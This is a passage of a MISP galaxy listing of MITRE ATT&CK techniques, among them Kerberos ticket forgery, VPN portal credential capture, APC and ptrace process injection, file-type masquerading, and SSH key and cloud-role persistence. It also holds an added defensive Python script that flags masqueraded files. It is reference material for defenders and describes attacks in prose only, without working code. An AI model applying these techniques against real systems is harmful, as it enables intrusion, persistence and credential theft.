A [Silver Ticket](https://attack.mitre.org/techniques/T1558/002) can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).(Citation: ADSecurity AD Kerberos Attacks)

A [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) can be obtained for the domain using the NTLM hash of the Key Distribution Service account (KRBTGT), which enables generation of TGTs for any account in Active Directory.(Citation: Campbell 2014)

Adversaries may also create a valid Kerberos ticket using other user information, such as stolen password hashes or AES keys. For example, "overpassing the hash" involves using an NTLM password hash to authenticate as a user (i.e. [Pass the Hash](https://attack.mitre.org/techniques/T1550/002)) while also using the password hash to create a valid Kerberos ticket.(Citation: Stealthbits Overpass-the-Hash)

The tag is: misp-galaxy:mitre-attack-pattern="Pass the Ticket - T1550.003"

Table 5674. Table References

Links

http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos

http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf

https://adsecurity.org/?p=556

https://attack.mitre.org/techniques/T1550/003

https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf

https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/

Web Portal Capture - T1056.003

Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.

This variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through [External Remote Services](https://attack.mitre.org/techniques/T1133) and [Valid Accounts](https://attack.mitre.org/techniques/T1078) or as part of the initial compromise by exploitation of the externally facing web service.(Citation: Volexity Virtual Private Keylogging)

The tag is: misp-galaxy:mitre-attack-pattern="Web Portal Capture - T1056.003"

Table 5675. Table References

Links

https://attack.mitre.org/techniques/T1056/003

https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/

Container Orchestration Job - T1053.007

Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.

In Kubernetes, a CronJob may be used to schedule a Job that runs one or more containers to perform specific tasks.(Citation: Kubernetes Jobs)(Citation: Kubernetes CronJob) An adversary therefore may utilize a CronJob to schedule deployment of a Job that executes malicious code in various nodes within a cluster.(Citation: Threat Matrix for Kubernetes)

The tag is: misp-galaxy:mitre-attack-pattern="Container Orchestration Job - T1053.007"

Table 5676. Table References

Links

https://attack.mitre.org/techniques/T1053/007

https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/

https://kubernetes.io/docs/concepts/workloads/controllers/job/

https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/

Windows Command Shell - T1059.003

Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)

Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.

Adversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execute various commands and payloads. Common uses include [cmd](https://attack.mitre.org/software/S0106) to execute a single command, or abusing [cmd](https://attack.mitre.org/software/S0106) interactively with input and output forwarded over a command and control channel.

The tag is: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003"

Table 5677. Table References

Links

https://attack.mitre.org/techniques/T1059/003

https://docs.microsoft.com/en-us/windows/terminal/tutorials/ssh

Network Trust Dependencies - T1590.003

Adversaries may gather information about the victim’s network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.

Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network trusts may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: Pentesting AD Forests) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).

The tag is: misp-galaxy:mitre-attack-pattern="Network Trust Dependencies - T1590.003"

Table 5678. Table References

Links

https://attack.mitre.org/techniques/T1590/003

https://www.slideshare.net/rootedcon/carlos-garca-pentesting-active-directory-forests-rooted2019

Space after Filename - T1036.006

Adversaries can hide a program’s true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system.

For example, if there is a Mach-O executable file called <code>evil.bin</code>, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to <code>evil.txt</code>, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to <code>evil.txt </code> (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed (Citation: Mac Backdoors are back).

Adversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious.

The tag is: misp-galaxy:mitre-attack-pattern="Space after Filename - T1036.006"

Table 5679. Table References

Links

https://arstechnica.com/security/2016/07/after-hiatus-in-the-wild-mac-backdoors-are-suddenly-back/

https://attack.mitre.org/techniques/T1036/006

Double File Extension - T1036.007

Adversaries may abuse a double extension in the filename as a means of masquerading the true file type. A file name may include a secondary file type extension that may cause only the first extension to be displayed (ex: <code>File.txt.exe</code> may render in some views as just <code>File.txt</code>). However, the second extension is the true file type that determines how the file is opened and executed. The real file extension may be hidden by the operating system in the file browser (ex: explorer.exe), as well as in any other software that follows the same or similar policies as the system.(Citation: PCMag DoubleExtension)(Citation: SOCPrime DoubleExtension)

Adversaries may abuse double extensions to attempt to conceal dangerous file types of payloads. A very common usage involves tricking a user into opening what they think is a benign file type but is actually executable code. Such files often pose as email attachments and allow an adversary to gain [Initial Access](https://attack.mitre.org/tactics/TA0001) into a user’s system via [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) then [User Execution](https://attack.mitre.org/techniques/T1204). For example, an executable file attachment named <code>Evil.txt.exe</code> may display as <code>Evil.txt</code> to a user. The user may then view it as a benign text file and open it, inadvertently executing the hidden malware.(Citation: SOCPrime DoubleExtension)

Common file types, such as text files (.txt, .doc, etc.) and image files (.jpg, .gif, etc.) are typically used as the first extension to appear benign. Executable extensions commonly regarded as dangerous, such as .exe, .lnk, .hta, and .scr, often appear as the second extension and true file type.

The tag is: misp-galaxy:mitre-attack-pattern="Double File Extension - T1036.007"

Table 5680. Table References

Links

https://attack.mitre.org/techniques/T1036/007

https://socprime.com/blog/rule-of-the-week-possible-malicious-file-double-extension/

https://www.pcmag.com/encyclopedia/term/double-extension

https://www.seqrite.com/blog/how-to-avoid-dual-attack-and-vulnerable-files-with-double-extension/

Install Digital Certificate - T1608.003

Adversaries may install SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are files that can be installed on servers to enable secure communications between systems. Digital certificates include information about the key, information about its owner’s identity, and the digital signature of an entity that has verified the certificate’s contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate securely with its owner. Certificates can be uploaded to a server, then the server can be configured to use the certificate to enable encrypted communication with it.(Citation: DigiCert Install SSL Cert)

Adversaries may install SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or lending credibility to a credential harvesting site. Installation of digital certificates may take place for a number of server types, including web servers and email servers.

Adversaries can obtain digital certificates (see [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) or create self-signed certificates (see [Digital Certificates](https://attack.mitre.org/techniques/T1587/003)). Digital certificates can then be installed on adversary controlled infrastructure that may have been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).

The tag is: misp-galaxy:mitre-attack-pattern="Install Digital Certificate - T1608.003"

Table 5681. Table References

Links

https://attack.mitre.org/techniques/T1608/003

https://www.digicert.com/kb/ssl-certificate-installation.htm

https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html

Masquerade File Type - T1036.008

Adversaries may masquerade malicious payloads as legitimate files through changes to the payload’s formatting, including the file’s signature, extension, and contents. Various file types have a typical standard format, including how they are encoded and organized. For example, a file’s signature (also known as header or magic bytes) consists of the first bytes of a file and is often used to identify the file’s type. The header of a JPEG file, for instance, is <code>0xFF 0xD8</code> and the file extension is either .JPE, .JPEG or .JPG.

Adversaries may edit the header’s hex code and/or the file extension of a malicious payload in order to bypass file validation checks and/or input sanitization. This behavior is commonly used when payload files are transferred (e.g., [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) and stored (e.g., [Upload Malware](https://attack.mitre.org/techniques/T1608/001)) so that adversaries may move their malware without triggering detections.

Common non-executable file types and extensions, such as text files (.txt) and image files (.jpg, .gif, etc.) may be typically treated as benign. Based on this, adversaries may use a file extension to disguise malware, such as giving PHP backdoor code a file name such as <code>test.gif</code>. A user may not know that a file is malicious due to the benign appearance and file extension.

Polyglot files, which are files that have multiple different file types and that function differently based on the application that will execute them, may also be used to disguise malware and its capabilities.(Citation: polygot_icedID)
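A defender-side triage check for the three masquerading tricks described in the entries above (trailing space, T1036.006; double extension, T1036.007; header/extension mismatch and image/PHP polyglots, T1036.008), added here as an example that is not part of the MISP galaxy or of ATT&CK. The signature table is deliberately short and the sample headers are constructed for the example.

```python
"""Triage a file name plus its leading bytes for the masquerading tricks the
T1036.006 / T1036.007 / T1036.008 entries describe.

Added example, not MISP or MITRE code; the samples at the bottom are
constructed inline (headers only, no real binaries).
"""
from __future__ import annotations

import os
from dataclasses import dataclass, field

# Well-known magic bytes -> content class. Deliberately short; extend per site.
SIGNATURES: list[tuple[bytes, str]] = [
    (b"MZ", "pe-executable"),                   # Windows PE (DOS stub)
    (b"\x7fELF", "elf-executable"),
    (b"\xfe\xed\xfa\xce", "macho-executable"),  # Mach-O 32-bit
    (b"\xfe\xed\xfa\xcf", "macho-executable"),  # Mach-O 64-bit
    (b"\xcf\xfa\xed\xfe", "macho-executable"),  # Mach-O 64-bit, little-endian
    (b"\xca\xfe\xba\xbe", "macho-executable"),  # Mach-O universal binary
    (b"\xff\xd8\xff", "jpeg"),
    (b"GIF87a", "gif"),
    (b"GIF89a", "gif"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"%PDF-", "pdf"),
    (b"PK\x03\x04", "zip"),                     # also .docx/.xlsx/.jar
]

# What the final extension claims the content is. "executable" is the generic
# class for extensions that legitimately carry native code of any format.
EXT_CLASS = {
    ".jpg": "jpeg", ".jpeg": "jpeg", ".jpe": "jpeg", ".gif": "gif",
    ".png": "png", ".pdf": "pdf", ".zip": "zip", ".docx": "zip",
    ".txt": "text", ".exe": "pe-executable", ".dll": "pe-executable",
    ".scr": "pe-executable", ".bin": "executable",
}

# Final extensions the T1036.007 entry names as commonly dangerous.
DANGEROUS_EXT = {".exe", ".lnk", ".hta", ".scr"}


@dataclass
class Finding:
    name: str
    issues: list[str] = field(default_factory=list)


def sniff(header: bytes) -> str | None:
    """Content class implied by the leading bytes, or None if unrecognised."""
    for magic, kind in SIGNATURES:
        if header.startswith(magic):
            return kind
    return None


def compatible(claimed: str, actual: str) -> bool:
    """True when the header agrees with what the extension claims."""
    if claimed == actual:
        return True
    return claimed == "executable" and actual.endswith("executable")


def triage(name: str, header: bytes) -> Finding:
    """Inspect one file name and its first bytes; list what looks wrong."""
    f = Finding(name)
    # T1036.006: a trailing space makes the OS ignore the visible extension.
    if name != name.rstrip():
        f.issues.append("trailing-whitespace")
    parts = os.path.basename(name.strip()).lower().split(".")
    exts = ["." + p for p in parts[1:]]  # every extension after the stem
    # T1036.007: benign-looking first extension, dangerous (true) last one.
    if len(exts) >= 2 and exts[-1] in DANGEROUS_EXT:
        f.issues.append("double-extension:" + "".join(exts[-2:]))
    claimed = EXT_CLASS.get(exts[-1]) if exts else None
    actual = sniff(header)
    # T1036.008: the header disagrees with the extension, or native code sits
    # behind an extension that claims nothing in particular.
    if actual and claimed and not compatible(claimed, actual):
        f.issues.append(f"type-mismatch:ext={claimed},magic={actual}")
    elif actual and not claimed and actual.endswith("executable"):
        f.issues.append(f"executable-content:{actual}")
    # Polyglot hint from the T1036.008 entry: PHP source inside an image file
    # (pass as many leading bytes as you are willing to scan).
    if actual in {"gif", "jpeg", "png"} and b"<?php" in header:
        f.issues.append("polyglot:php-in-image")
    return f


# Constructed sample inputs for the example.
SAMPLES = {
    "Evil.txt.exe": b"MZ\x90\x00\x03\x00\x00\x00",
    "evil.txt ": b"\xcf\xfa\xed\xfe\x07\x00\x00\x01",
    "test.gif": b"GIF89a\x01\x00\x01\x00<?php echo 'hi'; ?>",
    "photo.jpg": b"MZ\x90\x00",
    "report.pdf": b"%PDF-1.7\n",
}

if __name__ == "__main__":
    for fname, head in SAMPLES.items():
        print(repr(fname), triage(fname, head).issues or "clean")
```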

The tag is: misp-galaxy:mitre-attack-pattern="Masquerade File Type - T1036.008"

Table 5682. Table References

Links

https://attack.mitre.org/techniques/T1036/008

https://unit42.paloaltonetworks.com/polyglot-file-icedid-payload

Break Process Trees - T1036.009

An adversary may attempt to evade process tree-based analysis by modifying executed malware’s parent process ID (PPID). If endpoint protection software leverages the “parent-child” relationship for detection, breaking this relationship could result in the adversary’s behavior not being associated with previous process tree activity. On Unix-based systems breaking this process tree is common practice for administrators to execute software using scripts and programs.(Citation: 3OHA double-fork 2022)

On Linux systems, adversaries may execute a series of [Native API](https://attack.mitre.org/techniques/T1106) calls to alter malware’s process tree. For example, adversaries can execute their payload without any arguments, call fork() twice, then have the parent process exit. This creates a grandchild process with no parent process that is immediately adopted by the init system process (PID 1), which successfully disconnects the execution of the adversary’s payload from its previous process tree.

Another example is using the “daemon” syscall to detach from the current parent process and run in the background.(Citation: Sandfly BPFDoor 2022)(Citation: Microsoft XorDdos Linux Stealth 2022)

The tag is: misp-galaxy:mitre-attack-pattern="Break Process Trees - T1036.009"

Table 5683. Table References

Links

https://0xjet.github.io/3OHA/2022/04/11/post.html

https://attack.mitre.org/techniques/T1036/009

https://sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/

https://www.microsoft.com/en-us/security/blog/2022/05/19/rise-in-xorddos-a-deeper-look-at-the-stealthy-ddos-malware-targeting-linux-devices/

Additional Cloud Roles - T1098.003

An adversary may add additional roles or permissions to an adversary-controlled cloud account to maintain persistent access to a tenant. For example, adversaries may update IAM policies in cloud-based environments or add a new global administrator in Office 365 environments.(Citation: AWS IAM Policies and Permissions)(Citation: Google Cloud IAM Policies)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins).(Citation: Expel AWS Attacker) (Citation: Microsoft O365 Admin Roles)

This account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity. Adversaries may also modify existing [Valid Accounts](https://attack.mitre.org/techniques/T1078) that they have compromised. This could lead to privilege escalation, particularly if the roles added allow for lateral movement to additional accounts.

For example, in AWS environments, an adversary with appropriate permissions may be able to use the <code>CreatePolicyVersion</code> API to define a new version of an IAM policy or the <code>AttachUserPolicy</code> API to attach an IAM policy with additional or distinct permissions to a compromised user account.(Citation: Rhino Security Labs AWS Privilege Escalation)

The tag is: misp-galaxy:mitre-attack-pattern="Additional Cloud Roles - T1098.003"

Table 5684. Table References

Links

https://attack.mitre.org/techniques/T1098/003

https://cloud.google.com/iam/docs/policies

https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies.html

https://docs.microsoft.com/en-us/office365/admin/add-users/about-admin-roles?view=o365-worldwide

https://expel.com/blog/incident-report-from-cli-to-console-chasing-an-attacker-in-aws/

https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/

https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d

Asynchronous Procedure Call - T1055.004

Adversaries may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges. APC injection is a method of executing arbitrary code in the address space of a separate live process.

APC injection is commonly performed by attaching malicious code to the APC Queue (Citation: Microsoft APC) of a process’s thread. Queued APC functions are executed when the thread enters an alertable state.(Citation: Microsoft APC) A handle to an existing victim process is first created with native Windows API calls such as <code>OpenThread</code>. At this point <code>QueueUserAPC</code> can be used to invoke a function (such as <code>LoadLibraryA</code> pointing to a malicious DLL).

A variation of APC injection, dubbed "Early Bird injection", involves creating a suspended process in which malicious code can be written and executed before the process’s entry point (and potentially subsequent anti-malware hooks) via an APC.(Citation: CyberBit Early Bird Apr 2018) AtomBombing (Citation: ENSIL AtomBombing Oct 2016) is another variation that utilizes APCs to invoke malicious code previously written to the global atom table.(Citation: Microsoft Atom Table)

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via APC injection may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:mitre-attack-pattern="Asynchronous Procedure Call - T1055.004"

Table 5685. Table References

Links

https://attack.mitre.org/techniques/T1055/004

https://blog.ensilo.com/atombombing-brand-new-code-injection-for-windows

https://msdn.microsoft.com/library/windows/desktop/ms649053.aspx

https://msdn.microsoft.com/library/windows/desktop/ms681951.aspx

https://www.cyberbit.com/blog/endpoint-security/new-early-bird-code-injection-technique-discovered/

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

Web Session Cookie - T1550.004

Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)

Authentication cookies are commonly used in web applications, including cloud-based services, after a user has authenticated to the service so credentials are not passed and re-authentication does not need to occur as frequently. Cookies are often valid for an extended period of time, even if the web application is not actively used. After the cookie is obtained through [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539) or [Web Cookies](https://attack.mitre.org/techniques/T1606/001), the adversary may then import the cookie into a browser they control and is then able to use the site or application as the user for as long as the session cookie is active. Once logged into the site, an adversary can access sensitive information, read email, or perform actions that the victim account has permissions to perform.

There have been examples of malware targeting session cookies to bypass multi-factor authentication systems.(Citation: Unit 42 Mac Crypto Cookies January 2019)

The tag is: misp-galaxy:mitre-attack-pattern="Web Session Cookie - T1550.004"

Table 5686. Table References

Links

https://attack.mitre.org/techniques/T1550/004

https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/

https://wunderwuzzi23.github.io/blog/passthecookie.html

Credential API Hooking - T1056.004

Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:

  • Hook procedures, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)

  • Import address table (IAT) hooking, which uses modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)

  • Inline hooking, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)

The tag is: misp-galaxy:mitre-attack-pattern="Credential API Hooking - T1056.004"

Table 5687. Table References

Links

http://www.gmer.net/

https://attack.mitre.org/techniques/T1056/004

https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/

https://github.com/jay/gethooks

https://github.com/prekageo/winhook

https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx

https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx

https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis

https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html

https://www.adlice.com/userland-rootkits-part-1-iat-hooks/

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

https://www.exploit-db.com/docs/17802.pdf

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918

https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/

https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/

SSH Authorized Keys - T1098.004

Adversaries may modify the SSH <code>authorized_keys</code> file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The <code>authorized_keys</code> file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user’s home directory under <code><user-home>/.ssh/authorized_keys</code>.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under <code>/etc/ssh/sshd_config</code>.

Adversaries may modify SSH <code>authorized_keys</code> files directly with scripts or shell commands to add their own adversary-supplied public keys. In cloud environments, adversaries may be able to modify the SSH authorized_keys file of a particular virtual machine via the command line interface or REST API. For example, by using the Google Cloud CLI’s “add-metadata” command an adversary may add SSH keys to a user account.(Citation: Google Cloud Add Metadata)(Citation: Google Cloud Privilege Escalation) Similarly, in Azure, an adversary may update the authorized_keys file of a virtual machine via a PATCH request to the API.(Citation: Azure Update Virtual Machines) This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse)(Citation: Cybereason Linux Exim Worm) It may also lead to privilege escalation where the virtual machine or instance has distinct permissions from the requesting user.

Where authorized_keys files are modified via cloud APIs or command line interfaces, an adversary may achieve privilege escalation on the target virtual machine if they add a key to a higher-privileged user.

SSH keys can also be added to accounts on network devices, such as with the <code>ip ssh pubkey-chain</code> [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) command.(Citation: cisco_ip_ssh_pubkey_ch_cmd)

The tag is: misp-galaxy:mitre-attack-pattern="SSH Authorized Keys - T1098.004"

Table 5688. Table References

Links

https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/

https://attack.mitre.org/techniques/T1098/004

https://cloud.google.com/sdk/gcloud/reference/compute/instances/add-metadata

https://docs.microsoft.com/en-us/rest/api/compute/virtual-machines/update

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/d1/sec-d1-cr-book/sec-cr-i3.html#wp1254331478

https://www.cybereason.com/blog/new-pervasive-worm-exploiting-linux-exim-server-vulnerability

https://www.ssh.com/ssh/authorized_keys/

https://www.venafi.com/blog/growing-abuse-ssh-keys-commodity-malware-campaigns-now-equipped-ssh-capabilities

Terminal Services DLL - T1505.005

Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed Remote Desktop Services in some Windows Server OSs as of 2022, enables remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP.(Citation: Microsoft Remote Desktop Services)

[Windows Service](https://attack.mitre.org/techniques/T1543/003)s that are run as a "generic" process (ex: <code>svchost.exe</code>) load the service’s DLL file, the location of which is stored in a Registry entry named <code>ServiceDll</code>.(Citation: Microsoft System Services Fundamentals) The <code>termsrv.dll</code> file, typically stored in %SystemRoot%\System32\, is the default <code>ServiceDll</code> value for Terminal Services in HKLM\System\CurrentControlSet\services\TermService\Parameters\.

Adversaries may modify and/or replace the Terminal Services DLL to enable persistent access to victimized hosts.(Citation: James TermServ DLL) Modifications to this DLL could be done to execute arbitrary payloads (while also potentially preserving normal <code>termsrv.dll</code> functionality) as well as to simply enable abusable features of Terminal Services. For example, an adversary may enable features such as concurrent [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) sessions by either patching the <code>termsrv.dll</code> file or modifying the <code>ServiceDll</code> value to point to a DLL that provides increased RDP functionality.(Citation: Windows OS Hub RDP)(Citation: RDPWrap Github) On a non-server Windows OS this increased functionality may also enable an adversary to avoid Terminal Services prompts that warn/log out users of a system when a new RDP session is created.

The tag is: misp-galaxy:mitre-attack-pattern="Terminal Services DLL - T1505.005"

Table 5689. Table References

Links

http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/

https://attack.mitre.org/techniques/T1505/005

https://docs.microsoft.com/windows/win32/termserv/about-terminal-services

https://github.com/stascorp/rdpwrap

https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx

https://twitter.com/james_inthe_box/status/1150495335812177920

Thread Local Storage - T1055.005

Adversaries may inject malicious code into processes via thread local storage (TLS) callbacks in order to evade process-based defenses as well as possibly elevate privileges. TLS callback injection is a method of executing arbitrary code in the address space of a separate live process.

TLS callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code’s legitimate entry point. TLS callbacks are normally used by the OS to set up and/or clean up data used by threads. Manipulating TLS callbacks may be performed by allocating and writing to specific offsets within a process’ memory space using other [Process Injection](https://attack.mitre.org/techniques/T1055) techniques such as [Process Hollowing](https://attack.mitre.org/techniques/T1055/012).(Citation: FireEye TLS Nov 2017)

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via TLS callback injection may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:mitre-attack-pattern="Thread Local Storage - T1055.005"

Table 5690. Table References

Links

https://attack.mitre.org/techniques/T1055/005

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html

Ptrace System Calls - T1055.008

Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process.

Ptrace system call injection involves attaching to and modifying a running process. The ptrace system call enables a debugging process to observe and control another process (and each individual thread), including changing memory and register values.(Citation: PTRACE man) Ptrace system call injection is commonly performed by writing arbitrary code into a running process (ex: <code>malloc</code>) then invoking that memory with <code>PTRACE_SETREGS</code> to set the register containing the next instruction to execute. Ptrace system call injection can also be done with <code>PTRACE_POKETEXT</code>/<code>PTRACE_POKEDATA</code>, which copy data to a specific address in the target process’s memory (ex: the current address of the next instruction).(Citation: PTRACE man)(Citation: Medium Ptrace JUL 2018)

Ptrace system call injection may not be possible when targeting processes that are non-child processes and/or have higher privileges.(Citation: BH Linux Inject)

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via ptrace system call injection may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:mitre-attack-pattern="Ptrace System Calls - T1055.008"

Table 5691. Table References

Links

http://man7.org/linux/man-pages/man2/ptrace.2.html

http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html

https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing

https://attack.mitre.org/techniques/T1055/008

https://github.com/gaffe23/linux-inject/blob/master/slides_BHArsenal2015.pdf

https://medium.com/@jain.sm/code-injection-in-running-process-using-ptrace-d3ea7191a4be

https://www.gnu.org/software/acct/

Network Security Appliances - T1590.006

Adversaries may gather information about the victim’s network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598).(Citation: Nmap Firewalls NIDS) Information about network security appliances may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).

The tag is: misp-galaxy:mitre-attack-pattern="Network Security Appliances - T1590.006"

Table 5692. Table References

Links

https://attack.mitre.org/techniques/T1590/006

https://nmap.org/book/firewalls.html

Network Device CLI - T1059.008

Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious commands and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands.

